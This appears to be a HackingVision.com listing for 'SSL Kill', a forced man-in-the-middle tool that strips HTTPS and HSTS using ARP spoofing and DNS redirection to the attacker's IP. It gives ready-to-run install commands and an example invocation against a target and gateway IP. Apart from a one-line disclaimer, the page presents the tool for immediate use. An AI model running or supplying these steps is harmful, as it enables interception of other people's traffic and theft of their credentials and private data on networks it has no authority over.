SSL Kill – Forced Man-In-The-Middle HTTPs-Avoiding Transparent Proxy
Avoiding Transparent Proxy
SSL Kill is a forced man-in-the-middle transparent proxy that modifies HTTP requests and responses in order to avoid SSL and HSTS, to achieve that, it uses a two-way ARP spoofing plus a forced DNS resolver that redirects all name server queries to the attacker IP Address. This tool is for information security researchers and should not be used for criminal acts.
SSL Kill v1.2
$ sudo apt-get install build-essential python-dev libnetfilter-queue-dev $ git clone https://github.com/m4n3dw0lf/sslkill $ cd sslkill $ sudo pip install -r requirements.txt $ sudo chmod +x sslkill.py $ sudo ./sslkill.py -h
usage: Network interface: -i <INTERFACE> or --interface <INTERFACE> Target IP Address: -t <TARGET> or --target <TARGET> Gateway IP Address: -g <GATEWAY> or --gateway <GATEWAY> Listening Port: -l <PORT> or --listen <PORT> Debug mode: -d Turn debugger ON, default = OFF examples:
$ sudo ./sslkill.py -i wlan0 -t 10.0.0.3 -g 10.0.0.1
Please consider downloading Brave Browser by downloading Brave Browser through our website you won’t only be downloading a great privacy browser you will also be supporting (HackingVision.com). We are not using Google Ads as we respect our users privacy. We encourage you to use an Ad-blocker or a browser that has a built in ad-blocker and other privacy features such as VPN.
- Top 10 Phishing Tools - 10th April 2020
- Distributed Hash Cracking Hashcat Hashtopolis Tutorial - 30th March 2020
- Cracking Password Hashes with Hashcat Rule-based attack - 27th March 2020